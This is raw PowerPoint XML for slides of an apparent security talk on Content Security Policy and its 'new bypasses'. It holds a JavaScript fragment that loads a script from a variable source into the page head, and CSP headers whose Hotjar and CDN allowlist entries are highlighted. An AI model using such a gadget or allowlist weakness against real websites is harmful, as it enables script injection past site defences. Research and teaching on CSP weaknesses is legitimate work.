              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'source'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>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document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>createElement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"script"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4FC1FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4FC1FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>head</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>appendChild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CCCCCC"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// […]</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2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940626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hood looking at a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{332B1E12-24D4-1A87-C7DD-87EE0255A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8" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{621EF05D-1153-6EFA-463B-826ABBF282AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="120137"/>
            <a:ext cx="3730751" cy="6845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panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Show Time</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="184073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1</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Hotjar</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3746EE3E-7FDF-2FA5-2B58-387A1B120A18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="330782179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889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1</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Hotjar</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Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Content-Security-Policy</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552950" y="751344"/>
            <a:ext cx="6848676" cy="5355312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>default-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 'self' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ask.hotjar.io  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>*.hotjar.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>script-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 'nonce-zM1mRhUyMJ13LFoja7kkF2pH' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>*.hotjar.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>*.jsdelivr.net code.jquery.com;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>font-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 'self' data:;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>img-src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> * data:;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>style-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 'self' data: cdn.jsdelivr.net 'unsafe-inline’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>base-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>uri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 'none’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>object-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 'none';</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2850" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="329275383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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Why Dress Code?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{761739C8-A8F0-52DB-59B2-27A8909B2264}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1824038"/>
            <a:ext cx="10515600" cy="4486275"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="742950" indent="-742950">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="6600" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>How CSP works?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" indent="-742950">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="6600" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>How prevalent is it?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" indent="-742950">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="6600" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>How well configured?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" indent="-742950">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="6600" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>New bypasses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2048670550"/>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1</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Hotjar</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Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Content-Security-Policy</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552949" y="751344"/>
            <a:ext cx="7089153" cy="5793894"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>default-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 'self’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>connect-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ask.hotjar.io  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>*.hotjar.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>script-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 'nonce-zM1mRhUyMJ13LFoja7kkF2pH' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>*.hotjar.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>*.jsdelivr.net code.jquery.com;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>font-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 'self' data:;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>img-src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> * data:;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>style-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2850" b="0" i="0" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
